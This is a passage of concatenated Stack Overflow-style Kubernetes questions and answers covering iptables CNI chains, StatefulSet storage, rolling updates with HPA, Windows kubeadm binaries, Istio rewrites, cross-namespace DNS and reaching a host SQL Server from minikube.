MASQUERADE all -- 0.0.0.0/0 !224.0.0.0/4 /* name: "bridge" id: "a54a2f20dbe5d24ec4fb6b059f23aae392cc26853cf2b474a56dff2a2f2d6bb6" */
Chain CNI-34b02c799f7bc4e979c15266 (1 references)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 10.254.0.0/24 /* name: "bridge" id: "5a87d86a62dd299e1d36b2ccd631d58896f2724ad9b4e14a93b9dfaa162b09e3" */
MASQUERADE all -- 0.0.0.0/0 !224.0.0.0/4 /* name: "bridge" id: "5a87d86a62dd299e1d36b2ccd631d58896f2724ad9b4e14a93b9dfaa162b09e3" */
Chain CNI-3c0d02d02e5aa29b38ada7ba (1 references)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 10.254.0.0/24 /* name: "bridge" id: "cdd5d6cf1a772b2acd37471046f53d0aa635733f0d5447a11d76dbb2ee216378" */
MASQUERADE all -- 0.0.0.0/0 !224.0.0.0/4 /* name: "bridge" id: "cdd5d6cf1a772b2acd37471046f53d0aa635733f0d5447a11d76dbb2ee216378" */
Chain CNI-4d1b80b0072ade1be68c43d1 (1 references)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 10.254.0.0/24 /* name: "bridge" id: "2b90e720350fa78bf6e6756b941526bf181e0b48c6b87207bbc8f097933e67ba" */
MASQUERADE all -- 0.0.0.0/0 !224.0.0.0/4 /* name: "bridge" id: "2b90e720350fa78bf6e6756b941526bf181e0b48c6b87207bbc8f097933e67ba" */
Chain CNI-7699fcd0ab82a702bac28bc9 (1 references)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 10.254.0.0/24 /* name: "bridge" id: "3feed2ec479bd17f82cac60adfd1c79c81d4c53d536daa74a46e05f462e2d895" */
MASQUERADE all -- 0.0.0.0/0 !224.0.0.0/4 /* name: "bridge" id: "3feed2ec479bd17f82cac60adfd1c79c81d4c53d536daa74a46e05f462e2d895" */
Chain CNI-871343dd2a1a9738c94b4dba (1 references)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 10.254.0.0/24 /* name: "bridge" id: "1a3a7b27889e54494d1e9699efb158dc8f3bb85b147b80db84038c07fd4c9910" */
MASQUERADE all -- 0.0.0.0/0 !224.0.0.0/4 /* name: "bridge" id: "1a3a7b27889e54494d1e9699efb158dc8f3bb85b147b80db84038c07fd4c9910" */
Chain CNI-d2a650ff06e253010ea31f3d (1 references)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 10.254.0.0/24 /* name: "bridge" id: "f3252d60a15faa5ff6c4b2aabebdb47aa5652e12c9d874f538b33d6c5913ba47" */
MASQUERADE all -- 0.0.0.0/0 !224.0.0.0/4 /* name: "bridge" id: "f3252d60a15faa5ff6c4b2aabebdb47aa5652e12c9d874f538b33d6c5913ba47" */
Chain CNI-eb80e2736e1009010a27b4b4 (1 references)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 10.254.0.0/24 /* name: "bridge" id: "1891a61e27b764e4a36717166a2b83ce7d2baa5258e54f0ea183c4433b04de38" */
MASQUERADE all -- 0.0.0.0/0 !224.0.0.0/4 /* name: "bridge" id: "1891a61e27b764e4a36717166a2b83ce7d2baa5258e54f0ea183c4433b04de38" */
Chain DOCKER (2 references)
target prot opt source destination
RETURN all -- 0.0.0.0/0 0.0.0.0/0
Chain KUBE-MARK-DROP (0 references)
target prot opt source destination
MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x8000
Chain KUBE-MARK-MASQ (4 references)
target prot opt source destination
MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x4000
Chain KUBE-NODEPORTS (1 references)
target prot opt source destination
Chain KUBE-POSTROUTING (1 references)
target prot opt source destination
MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service traffic requiring SNAT */ mark match 0x4000/0x4000
Chain KUBE-SEP-G5V522HWZT6RKRAC (2 references)
target prot opt source destination
KUBE-MARK-MASQ all -- 192.168.56.3 0.0.0.0/0 /* default/kubernetes:https */
DNAT tcp -- 0.0.0.0/0 0.0.0.0/0 /* default/kubernetes:https */ recent: SET name: KUBE-SEP-G5V522HWZT6RKRAC side: source mask: 255.255.255.255 tcp to:192.168.56.3:6443
Chain KUBE-SEP-O34O4OGFBAADOMEG (1 references)
target prot opt source destination
KUBE-MARK-MASQ all -- 10.254.0.2 0.0.0.0/0 /* default/mongodb:27017 */
DNAT tcp -- 0.0.0.0/0 0.0.0.0/0 /* default/mongodb:27017 */ tcp to:10.254.0.2:27017
Chain KUBE-SERVICES (2 references)
target prot opt source destination
KUBE-MARK-MASQ tcp -- !10.254.0.0/16 10.254.0.1 /* default/kubernetes:https cluster IP */ tcp dpt:443
KUBE-SVC-NPX46M4PTMTKRN6Y tcp -- 0.0.0.0/0 10.254.0.1 /* default/kubernetes:https cluster IP */ tcp dpt:443
KUBE-MARK-MASQ tcp -- !10.254.0.0/16 10.254.0.117 /* default/mongodb:27017 cluster IP */ tcp dpt:27017
KUBE-SVC-ZDG6MRTNE2LQFT34 tcp -- 0.0.0.0/0 10.254.0.117 /* default/mongodb:27017 cluster IP */ tcp dpt:27017
KUBE-NODEPORTS all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service nodeports; NOTE: this must be the last rule in this chain */ ADDRTYPE match dst-type LOCAL
Chain KUBE-SVC-NPX46M4PTMTKRN6Y (1 references)
target prot opt source destination
KUBE-SEP-G5V522HWZT6RKRAC all -- 0.0.0.0/0 0.0.0.0/0 /* default/kubernetes:https */ recent: CHECK seconds: 10800 reap name: KUBE-SEP-G5V522HWZT6RKRAC side: source mask: 255.255.255.255
KUBE-SEP-G5V522HWZT6RKRAC all -- 0.0.0.0/0 0.0.0.0/0 /* default/kubernetes:https */
Chain KUBE-SVC-ZDG6MRTNE2LQFT34 (1 references)
target prot opt source destination
KUBE-SEP-O34O4OGFBAADOMEG all -- 0.0.0.0/0 0.0.0.0/0 /* default/mongodb:27017 */
</code></pre>
<p>I removed the --network-plugin=cni flag from the kubelet service and upgraded Kubernetes to 1.13.0, which solved the problem.</p>
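<p>If you hit the same thing, a rough way to locate and change that flag (exact paths depend on how the kubelet service was installed):</p>

<pre><code>$ systemctl cat kubelet | grep network-plugin   # find where the flag is set
$ # edit the unit file or drop-in to remove --network-plugin=cni, then:
$ sudo systemctl daemon-reload
$ sudo systemctl restart kubelet
</code></pre>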
|
| <p>I have a k8s cluster (1 master node) that was spun up in a private subnet. I want to set up an AWS load balancer in order to use <code>kubectl</code> from the internet. I tried setting up a network load balancer but it didn't work. Can anyone suggest an approach to achieve that goal, please?</p>
| <p>A load balancer will not help you use <code>kubectl</code> to manage kubernetes. </p>
<p>You either need a public IP or a VPN setup within your VPC. Consider using OpenVPN to allow your kubectl running on your desktop to connect to Kubernetes.</p>
|
<p>I have deployed a Kubernetes cluster with a StatefulSet for MySQL. Each pod has its own PVC.</p>
<p>For example: with 3 pods there are 3 separate 5GB EBS PVCs.</p>
<p>So which way is better: using one PVC shared by all pods, or a different PVC for each pod?</p>
| <p>A StatefulSet must use volumeClaimTemplates if you want dedicated storage for each pod of the set. Based on that template, a PersistentVolumeClaim is created for each pod and the volume is configured to be bound to that claim. The generated PersistentVolumeClaim names consist of the volumeClaimTemplate name + pod name + ordinal number.
So add a volumeClaimTemplates section to your StatefulSet YAML (and delete any references to a specific persistentVolumeClaim), something like this: </p>
<pre><code>volumeClaimTemplates:
- metadata:
name: mysql-data
spec:
resources:
requests:
storage: 10Gi
accessModes:
- ReadWriteOnce
</code></pre>
<p>Then create your StatefulSet, and afterwards examine one of its pods (<code>kubectl get pod pod-name-0 -o yaml</code>); you’ll see something like this (the volumes part of the output):</p>
<pre><code>volumes:
- name: mysql-data
persistentVolumeClaim:
claimName: mysql-data-pod-name-0   # dynamically created claim based on the template
</code></pre>
<p>So by using volumeClaimTemplates you don’t need to create separate PVCs yourself and then reference each PVC individually to be mounted in your container at a specific mountPath (remember that each pod of a set must reference a different PVC, 1 PVC - 1 PV).
This is part of the “containers” definition of your StatefulSet YAML:</p>
<pre><code>volumeMounts:
- name: mysql-data   # references the volumeClaimTemplate by name (not the generated PVC name)
mountPath: /var/lib/mysql
</code></pre>
<p>So aiming for each pod of the set to have dedicated storage without using volumeClaimTemplates leads to a lot of problems and overcomplicates managing and scaling it.</p>
|
<p>In a nutshell, most of our apps are configured with the following <code>strategy</code> in the Deployment - </p>
<pre><code> strategy:
rollingUpdate:
maxSurge: 25%
maxUnavailable: 25%
type: RollingUpdate
</code></pre>
<p>The Horizonatal Pod Autoscaler is configured as so </p>
<pre><code>spec:
maxReplicas: 10
minReplicas: 2
</code></pre>
<p>Now when our application was redeployed, instead of running a rolling update, it instantly terminated 8 of our pods and dropped the number of pods to <code>2</code> which is the min number of replicas available. This happened in a fraction of a second as you can see here.</p>
<p><a href="https://i.stack.imgur.com/V7AVN.png" rel="noreferrer"><img src="https://i.stack.imgur.com/V7AVN.png" alt="enter image description here"></a></p>
<p>Here is the output of <code>kubectl get hpa</code> - </p>
<p><a href="https://i.stack.imgur.com/ehlyV.png" rel="noreferrer"><img src="https://i.stack.imgur.com/ehlyV.png" alt="enter image description here"></a></p>
<p>As <code>maxUnavailable</code> is 25%, shouldn't only about 2-3 pods go down at max ? Why did so many pods crash at once ? It seems as though rolling update is useless if it works this way.</p>
<p>What am I missing ?</p>
| <p>After looking at this question, I decided to try this in a test environment to check whether I could reproduce it.</p>
<p>I set up <code>metrics-server</code> to provide metrics and configured an HPA. I followed these steps to set up the HPA and deployment:</p>
<p><a href="https://stackoverflow.com/questions/53725248/how-to-enable-kubeapi-server-for-hpa-autoscaling-metrics/53727101#53727101">How to Enable KubeAPI server for HPA Autoscaling Metrics</a></p>
<p>Once I had a working HPA and the maximum of <code>10 pods</code> running on the system, I updated the image using:</p>
<pre><code>[root@ip-10-0-1-176 ~]# kubectl get hpa
NAME REFERENCE TARGETS MINPODS MAXPODS REPLICAS AGE
php-apache Deployment/php-apache 49%/50% 1 10 10 87m
[root@ip-10-0-1-176 ~]# kubectl get pods
NAME READY STATUS RESTARTS AGE
load-generator-557649ddcd-6jlnl 1/1 Running 0 61m
php-apache-75bf8f859d-22xvv 1/1 Running 0 91s
php-apache-75bf8f859d-dv5xg 1/1 Running 0 106s
php-apache-75bf8f859d-g4zgb 1/1 Running 0 106s
php-apache-75bf8f859d-hv2xk 1/1 Running 0 2m16s
php-apache-75bf8f859d-jkctt 1/1 Running 0 2m46s
php-apache-75bf8f859d-nlrzs 1/1 Running 0 2m46s
php-apache-75bf8f859d-ptg5k 1/1 Running 0 106s
php-apache-75bf8f859d-sbctw 1/1 Running 0 91s
php-apache-75bf8f859d-tkjhb 1/1 Running 0 55m
php-apache-75bf8f859d-wv5nc 1/1 Running 0 106s
[root@ip-10-0-1-176 ~]# kubectl set image deployment php-apache php-apache=hpa-example:v1 --record
deployment.extensions/php-apache image updated
[root@ip-10-0-1-176 ~]# kubectl get pods
NAME READY STATUS RESTARTS AGE
load-generator-557649ddcd-6jlnl 1/1 Running 0 62m
php-apache-75bf8f859d-dv5xg 1/1 Terminating 0 2m40s
php-apache-75bf8f859d-g4zgb 1/1 Terminating 0 2m40s
php-apache-75bf8f859d-hv2xk 1/1 Terminating 0 3m10s
php-apache-75bf8f859d-jkctt 1/1 Running 0 3m40s
php-apache-75bf8f859d-nlrzs 1/1 Running 0 3m40s
php-apache-75bf8f859d-ptg5k 1/1 Terminating 0 2m40s
php-apache-75bf8f859d-sbctw 0/1 Terminating 0 2m25s
php-apache-75bf8f859d-tkjhb 1/1 Running 0 56m
php-apache-75bf8f859d-wv5nc 1/1 Terminating 0 2m40s
php-apache-847c8ff9f4-7cbds 1/1 Running 0 6s
php-apache-847c8ff9f4-7vh69 1/1 Running 0 6s
php-apache-847c8ff9f4-9hdz4 1/1 Running 0 6s
php-apache-847c8ff9f4-dlltb 0/1 ContainerCreating 0 3s
php-apache-847c8ff9f4-nwcn6 1/1 Running 0 6s
php-apache-847c8ff9f4-p8c54 1/1 Running 0 6s
php-apache-847c8ff9f4-pg8h8 0/1 Pending 0 3s
php-apache-847c8ff9f4-pqzjw 0/1 Pending 0 2s
php-apache-847c8ff9f4-q8j4d 0/1 ContainerCreating 0 4s
php-apache-847c8ff9f4-xpbzl 0/1 Pending 0 1s
</code></pre>
<p>Also, I kept a job running in the background that appended the <code>kubectl get pods</code> output to a file every second. At no point during the image upgrade did the number of pods go below 8. </p>
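<p>A background loop along these lines captures that (the file name is arbitrary):</p>

<pre><code>$ while true; do kubectl get pods >> pods-during-rollout.log; sleep 1; done &
</code></pre>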
<p>I believe you need to check how you're setting up your rolling upgrade. Are you using a Deployment or a bare ReplicaSet? I kept the <code>rolling update</code> strategy the same as yours (<code>maxUnavailable: 25%</code> and <code>maxSurge: 25%</code>) with a Deployment and it works well for me.</p>
|
| <p>I am new to Kubernetes. Basically, I am trying to add a Windows node to a cluster that contains Linux nodes. My host machine is Linux. For now, I am trying to add only 1 Windows node, but in the future it should work for multiple Windows nodes. <strong>While joining the Windows node to the Kubernetes cluster using kubeadm</strong>, it throws an error message. </p>
<p>As it is trying to execute "kubeadm join.." on the Windows node, I am trying to install kubeadm on the Windows machine, but with no luck.</p>
<p>It throws an error such as: </p>
<pre><code>"fatal: [windows]: FAILED! => {
"changed": true,
"cmd": "kubeadm join <IP>:<port> --token <jdhsjhsjdhsd> --discovery-token-ca-cert-hash sha256:<somekey> --node-name <kubernetes_node_hostname>",
"delta": "0:00:00.732545",
"end": "2018-12-27 07:39:26.496097",
"msg": "non-zero return code",
"rc": 1,
"start": "2018-12-27 07:39:25.763552",
"stderr": "kubeadm : The term 'kubeadm' is not recognized as the name of a cmdlet, function, script file, or operable program. \r\nCheck the spelling of the name, or if a path was included, verify that the path is correct and try again.\r\nAt line:1 char:65\r\n+ ... :InputEncoding = New-Object Text.UTF8Encoding $false;"
</code></pre>
| <p>You can download all the various binaries from links in the Changelog for each release. <a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.13.md#downloads-for-v1131" rel="nofollow noreferrer">https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.13.md#downloads-for-v1131</a> is the latest 1.13 as this writing.</p>
<p><a href="https://dl.k8s.io/v1.13.1/kubernetes-node-windows-amd64.tar.gz" rel="nofollow noreferrer">https://dl.k8s.io/v1.13.1/kubernetes-node-windows-amd64.tar.gz</a> are the node binaries in particular which includes Kubeadm as well as other things needed to run a node.</p>
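<p>A rough sketch of getting those onto the Windows node (the download/extraction tooling is up to you — e.g. PowerShell plus 7-Zip also works; the paths below are what the node tarball should contain):</p>

<pre><code>curl -LO https://dl.k8s.io/v1.13.1/kubernetes-node-windows-amd64.tar.gz
tar -xzf kubernetes-node-windows-amd64.tar.gz
REM kubeadm.exe, kubelet.exe, kube-proxy.exe and kubectl.exe should be under kubernetes\node\bin\
REM copy them to a directory on PATH (e.g. C:\k\) so that "kubeadm join ..." can be run
</code></pre>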
|
<p>I previously created a Flask server that spawns Docker containers using the Docker Python SDK. When a client hits a specific endpoint, the server would generate a container. It would maintain queues, and it would be able to kill containers that didn't respond to requests. </p>
<p>I want to migrate towards Kubernetes, but I am starting to think my current server won't be able to "spawn" jobs as pods automatically like in docker. </p>
<pre><code>docker.from_env().containers.run('alpine', 'echo hello world')
</code></pre>
<p>Is Docker Swarm a better solution for this, or is there a hidden practice that is done in Kubernetes? Would the Kubernetes Python API be a logical solution for automatically generating pods and jobs, where the Flask server is a pod that manages other pods within the cluster? </p>
| <p>'Kubectl run' is much like 'docker run' in that it will create a Pod with a container based on a docker image (e.g. <a href="https://stackoverflow.com/questions/34601650/how-do-i-run-curl-command-from-within-a-kubernetes-pod">How do i run curl command from within a Kubernetes pod</a>). See <a href="https://kubernetes.io/docs/reference/kubectl/docker-cli-to-kubectl/" rel="nofollow noreferrer">https://kubernetes.io/docs/reference/kubectl/docker-cli-to-kubectl/</a> for more comparison. But what you run with k8s are Pods/Jobs that contain containers rather than running containers directly so this will add an extra layer of complexity for you.</p>
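<p>For comparison with the <code>docker run</code> line above, the rough <code>kubectl</code> equivalent would be something like this (with <code>--restart=OnFailure</code> it creates a Job object instead of a bare Pod):</p>

<pre><code>kubectl run hello --image=alpine --restart=Never -- echo hello world
</code></pre>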
<p>Kubernetes is more about orchestrating services rather than running short-lived jobs. It has some features and can be used to run jobs but that isn't its central focus. If you're going in that direction you may want to look at knative (and knative build) or kubeless as what you describe sounds rather like the serverless concept. Or if you are thinking more about Jobs then perhaps brigade (<a href="https://brigade.sh" rel="nofollow noreferrer">https://brigade.sh</a>). (For more see <a href="https://www.quora.com/Is-Kubernetes-suited-for-long-running-batch-jobs" rel="nofollow noreferrer">https://www.quora.com/Is-Kubernetes-suited-for-long-running-batch-jobs</a>) If you are looking to run web app workloads that serve requests then note that you don't need to kill containers that fail to respond on k8s as k8s will monitor and restart them for you. </p>
<p>I don't know swarm well enough to compare. I suspect it would be a bit easier for you as it is aimed more centrally at docker (the k8s API is intended to support other runtimes) but perhaps somebody else can comment on that. Whether using swarm instead helps you will I guess depend on your motivations. </p>
|
<p>I have a repo for maintaining multiple locust scripts to load test many of my target-hosts/services. </p>
<p>How to integrate these scripts into the helm installation of stable/locust on one of k8s cluster?</p>
<p>We currently run locust master and slave manually on different ec2 instances and perform load tests on that.</p>
<p>We want to setup locust on k8s. This is in preliminary stages.</p>
| <p>There is an outstanding issue with that chart at the moment that it doesn't provide a clear way to inject scripts. You currently have to effectively add them yourself to the docker image or create your own copy of the chart. This could be made more flexible and there is aspiration to do so - see <a href="https://github.com/helm/charts/issues/2560" rel="nofollow noreferrer">https://github.com/helm/charts/issues/2560</a></p>
|
<p>I'd like to run several stateful applications (such as MongoDB, Kafka, etc.). All of them recommend using XFS as file system, however I don't know how I can ensure the creation of a XFS file system in Google's Kubernetes Engine / Google Cloud Compute Engine.</p>
<p>I usually deploy my applications with a helm chart and I couldn't find any hints that it would take care of the XFS filesystem for me either.</p>
<p><strong>Question:</strong></p>
<p>Can someone explain me how I can ensure the creation of XFS volumes in GKE / GCE / Kubernetes?</p>
| <p>At the moment, using XFS as the file system on Google Kubernetes Engine is not supported, but there is a <a href="https://issuetracker.google.com/62613829" rel="nofollow noreferrer">feature request</a> to support XFS on Container-Optimized OS (when choosing COS).
Therefore, you can choose the Ubuntu node image for your XFS needs; check this <a href="https://medium.com/@allanlei/mounting-xfs-on-gke-adcf9bd0f212" rel="nofollow noreferrer">link</a>.</p>
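<p>As a sketch, adding an Ubuntu-based node pool to an existing cluster looks roughly like this (cluster, pool and zone names are placeholders; formatting and mounting the volume as XFS is still a separate step):</p>

<pre><code>gcloud container node-pools create xfs-pool \
  --cluster my-cluster \
  --zone europe-west3-a \
  --image-type UBUNTU \
  --num-nodes 3
</code></pre>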
|
<p>I want to route 70% percentage of my traffic coming to service A to an external end point and append the URL.</p>
<p>To achieve this I created an externalName type service which points to external endpoint and then use treafik ingress controller to divide the weight in percentage.</p>
<p>My service definition looks something like this: </p>
<pre><code> ---
apiVersion: v1
kind: Service
metadata:
name: wensleydale
spec:
ports:
- name: http
targetPort: 80
port: 80
selector:
app: cheese
task: wensleydale
---
kind: Service
apiVersion: v1
metadata:
name: test-service
spec:
type: ExternalName
externalName: www.google.com
ports:
- name: http
targetPort: 80
port: 80
selector:
app: cheese
task: test-service
</code></pre>
<p>Ingress.yaml:</p>
<pre><code> apiVersion: extensions/v1beta1
kind: Ingress
metadata:
annotations:
traefik.ingress.kubernetes.io/service-weights: |
test-service: 70%
wensleydale: 30%
name: cheese
spec:
rules:
- http:
paths:
- backend:
serviceName: test-service
servicePort: 80
path: /
- backend:
serviceName: wensleydale
servicePort: 80
path: /
</code></pre>
<p>What I want in addition is when traffic goes to <code>test-service</code>, I want to append path.<br>
In my <code>test-service</code> I want the URL to be something like <code>www.google.com/something</code> </p>
<p>I'm open to use other tools to achieve this. </p>
| <p>You can do the following:</p>
<ol>
<li><p>Use Istio Ingress Gateway instead of a traefik gateway. Istio Ingress Gateway is the recommended way for Ingress control in Istio. See <a href="https://istio.io/docs/tasks/traffic-management/ingress/" rel="nofollow noreferrer">https://istio.io/docs/tasks/traffic-management/ingress/</a></p></li>
<li><p>In the corresponding Virtual Service, use HTTPRewrite directive <a href="https://istio.io/docs/reference/config/istio.networking.v1alpha3/#HTTPRewrite" rel="nofollow noreferrer">https://istio.io/docs/reference/config/istio.networking.v1alpha3/#HTTPRewrite</a> :</p></li>
</ol>
<pre><code>rewrite:
  uri: /something
</code></pre>
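<p>For a bit more context, here is a minimal sketch of how the weight split and the rewrite fit together in a VirtualService. The gateway name and host below are assumptions based on your setup (you may also need a ServiceEntry for the external host), and note that <code>rewrite</code> applies to the whole HTTP route, so in this exact form the path is rewritten for both destinations:</p>

<pre><code>apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
  name: cheese
spec:
  hosts:
  - "myhostname.com"        # assumption: the host you expose on the gateway
  gateways:
  - cheese-gateway          # assumption: an Istio Gateway created separately
  http:
  - rewrite:
      uri: /something
    route:
    - destination:
        host: test-service  # the ExternalName service from your manifest
      weight: 70
    - destination:
        host: wensleydale
      weight: 30
</code></pre>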
|
| <p>I am having an issue with Kubernetes on GKE. I am unable to resolve services by name. I have a <code>drone-server</code> service running which is connected to a single pod. The ingress connected to the service connects successfully, but when trying to do, for example, an <code>nslookup</code> from a <code>busybox</code> pod, it is unable to resolve the hostname.</p>
<p><strong>Services:</strong></p>
<pre><code>$ k get services -n drone
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
drone-server ClusterIP 10.39.242.23 <none> 80/TCP 2d
drone-vault ClusterIP 10.39.248.166 <none> 80/TCP 40m
</code></pre>
<p><strong>Busybox nslookup:</strong></p>
<pre><code>$ kubectl exec -ti busybox -- nslookup drone-server
Server: 10.39.240.10
Address 1: 10.39.240.10 kube-dns.kube-system.svc.cluster.local
nslookup: can't resolve 'drone-server'
</code></pre>
<p>When i try to lookup <code>kubernetes.default</code> am I getting a local address back:</p>
<pre><code>$ kubectl exec -ti busybox -- nslookup kubernetes.default
Server: 10.39.240.10
Address 1: 10.39.240.10 kube-dns.kube-system.svc.cluster.local
Name: kubernetes.default
Address 1: 10.39.240.1 kubernetes.default.svc.cluster.local
</code></pre>
<p><strong>Resolv config:</strong></p>
<p><code>/etc/resolv.conf</code> seems to be configured correctly (the nameserver is matching the kube-dns service cluster ip).</p>
<pre><code>$ kubectl exec -ti busybox -- cat /etc/resolv.conf
nameserver 10.39.240.10
search default.svc.cluster.local svc.cluster.local cluster.local europe-west3-a.c.cluster-a8e6d9e252b63e03.internal c.cluster-a8e6d9e252b63e03.internal google.internal
options ndots:5
</code></pre>
| <p>Your <code>drone-server</code> service is in the <code>drone</code> namespace and you're trying to nslookup from default namespace. You need to provide the namespace also in command as follows:</p>
<pre><code>kubectl exec -ti busybox -- nslookup drone-server.drone
</code></pre>
<p>This is because your busybox pod is in the default namespace and it tries to look up drone-server in the same namespace.</p>
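<p>The fully qualified name also works, from any namespace:</p>

<pre><code>kubectl exec -ti busybox -- nslookup drone-server.drone.svc.cluster.local
</code></pre>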
|
<p>I am trying to deploy an asp.net core 2.2 application in Kubernetes. This application is a simple web page that need an access to an SQL Server database to display some information. This database is hosted on my local development computer (localhost) and the web application is deployed in a minikube cluster to simulate the production environment where my web application could be deployed in a cloud and access a remote database. </p>
<p>I managed to display my web application by exposing port 80. However, I can't figure out how to make my web application connect to my SQL Server database hosted on my local computer from inside the cluster.</p>
<p>I assume that my connection string is correct since my web application can connect to the SQL Server database when I deploy it on an IIS local server, in a docker container (docker run) or a docker service (docker create service) but not when it is deployed in a Kubernetes cluster. I understand that the cluster is in a different network so I tried to create a service without selector as described in <a href="https://stackoverflow.com/questions/43354167/minikube-expose-mysql-running-on-localhost-as-service">this question</a>, but no luck... I even tried to change the connection string IP address to match the one of the created service but it failed too. </p>
<p>My firewall is setup to accept inbound connection to 1433 port.</p>
<p>My SQL Server database is configured to allow remote access.</p>
<p>Here is the connection string I use:</p>
<pre><code>"Server=172.24.144.1\\MyServer,1433;Database=TestWebapp;User Id=user_name;Password=********;"
</code></pre>
<p>And here is the file I use to deploy my web application:</p>
<pre><code>apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: webapp
spec:
replicas: 1
template:
metadata:
labels:
app: webapp
spec:
containers:
- name: webapp
image: <private_repo_url>/webapp:db
imagePullPolicy: Always
ports:
- containerPort: 80
- containerPort: 443
- containerPort: 1433
imagePullSecrets:
- name: gitlab-auth
volumes:
- name: secrets
secret:
secretName: auth-secrets
---
apiVersion: v1
kind: Service
metadata:
name: webapp
labels:
app: webapp
spec:
type: NodePort
selector:
app: webapp
ports:
- name: port-80
port: 80
targetPort: 80
nodePort: 30080
- name: port-443
port: 443
targetPort: 443
nodePort: 30443
---
apiVersion: v1
kind: Service
metadata:
name: sql-server
labels:
app: webapp
spec:
ports:
- name: port-1433
port: 1433
targetPort: 1433
---
apiVersion: v1
kind: Endpoints
metadata:
name: sql-server
labels:
app: webapp
subsets:
- addresses:
- ip: 172.24.144.1 <-- IP of my local computer where SQL Server is running
ports:
- port: 1433
</code></pre>
<p>So I get a deployment named 'webapp' with only one pod, two services named 'webapp' and 'sql-server' and two endpoints also named 'webapp' and 'sql-server'. Here are their details:</p>
<pre><code>> kubectl describe svc webapp
Name: webapp
Namespace: default
Labels: app=webapp
Annotations: <none>
Selector: app=webapp
Type: NodePort
IP: 10.108.225.112
Port: port-80 80/TCP
TargetPort: 80/TCP
NodePort: port-80 30080/TCP
Endpoints: 172.17.0.4:80
Port: port-443 443/TCP
TargetPort: 443/TCP
NodePort: port-443 30443/TCP
Endpoints: 172.17.0.4:443
Session Affinity: None
External Traffic Policy: Cluster
Events: <none>
> kubectl describe svc sql-server
Name: sql-server
Namespace: default
Labels: app=webapp
Annotations: <none>
Selector: <none>
Type: ClusterIP
IP: 10.107.142.32
Port: port-1433 1433/TCP
TargetPort: 1433/TCP
Endpoints:
Session Affinity: None
Events: <none>
> kubectl describe endpoints webapp
Name: webapp
Namespace: default
Labels: app=webapp
Annotations: <none>
Subsets:
Addresses: 172.17.0.4
NotReadyAddresses: <none>
Ports:
Name Port Protocol
---- ---- --------
port-443 443 TCP
port-80 80 TCP
Events: <none>
> kubectl describe endpoints sql-server
Name: sql-server
Namespace: default
Labels: app=webapp
Annotations: <none>
Subsets:
Addresses: 172.24.144.1
NotReadyAddresses: <none>
Ports:
Name Port Protocol
---- ---- --------
<unset> 1433 TCP
Events: <none>
</code></pre>
<p>I am expecting to connect to the SQL Server database but when my application is trying to open the connection I get this error:</p>
<blockquote>
<p>SqlException: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: TCP Provider, error: 40 - Could not open a connection to SQL Server)</p>
</blockquote>
<p>I am new to Kubernetes and I am not very comfortable with networking, so any help is welcome.
The best help would be some advice/tools to debug this, since I don't even know where or when the connection attempt is blocked...</p>
<p>Thank you!</p>
| <p>What you consider the IP address of your host is a private IP for an internal network. It is possible that this IP address is the one that your machine uses on the "real" network you are using. The kubernetes virtual network is on a different subnet and thus - the IP that you use internally is not accessible.</p>
<pre><code>subsets:
- addresses:
- ip: 172.24.144.1 <-- IP of my local computer where SQL Server is running
ports:
- port: 1433
</code></pre>
<p>You can connect via the DNS entry <em>host.docker.internal</em>.
Read more <a href="https://docs.docker.com/docker-for-mac/networking/#use-cases-and-workarounds" rel="noreferrer">here</a> and <a href="https://docs.docker.com/docker-for-windows/networking/#known-limitations-use-cases-and-workarounds" rel="noreferrer">here for Windows</a>.</p>
<p>I am not certain if that works in minikube - there used to be a different DNS name for the host in the Linux/Windows implementations. </p>
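<p>If that name resolves from inside your pods, only the server part of the connection string needs to change — a sketch based on the string in your question (keep the <code>\MyServer</code> instance name only if SQL Server runs as a named instance):</p>

<pre><code>"Server=host.docker.internal\\MyServer,1433;Database=TestWebapp;User Id=user_name;Password=********;"
</code></pre>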
<p>If you want to use the IP (bear in mind it would change eventually), you can probably track it down and ensure it is the one "visible" from withing the virtual subnet.</p>
<p>PS: I am using the Kubernetes that ships with Docker now; it seems easier to work with. </p>
|
<p>I am running a Kubernetes cluster with 3 master and 3 nodes.</p>
<p>I have found this to auto-scale worker nodes based on the pod's status.
<a href="https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler/cloudprovider/aws" rel="nofollow noreferrer">https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler/cloudprovider/aws</a></p>
<p>But, I couldn't find any blog or add-on to auto-scale master nodes.</p>
<p>Is there any reason to auto-scale master nodes, if yes how can we do that?</p>
| <p>There is no need to <code>autoscale</code> the master nodes. In practical terms, your worker nodes' responsibility is to run your workload, and your master nodes' responsibility is to make sure that your worker nodes are in the desired state in the cluster.</p>
<p>End users send requests to your application (pods), and as the load increases the application needs to scale horizontally, so more pods should be spawned. If the resources on the worker nodes are insufficient to run those pods, more worker nodes should be spawned.</p>
<p>In a large cluster we do not run workloads on the master nodes, but we need to make sure the control plane is highly available so that there is no single point of failure for orchestrating the worker nodes. For that we can have a 3-master (multi-master) cluster in place.</p>
<p>For worker nodes we worry about <code>horizontal scalability</code>, and for master nodes we worry about <code>high availability</code>.</p>
<p>But for building large cluster, you need to provide adequate resources to master nodes for handling the orchestration of load on worker nodes.</p>
<p>For more information on building large cluster, please refer official document:</p>
<p><a href="https://kubernetes.io/docs/setup/cluster-large/" rel="nofollow noreferrer">https://kubernetes.io/docs/setup/cluster-large/</a></p>
<p>In a nutshell, you can even have one master for 1000 worker nodes if you provide enough resources to that node. So, there is no reason to autoscale the masters compared to the challenges we would face in doing so. </p>
|
<p>I'd like to run Windows containers in GKE.
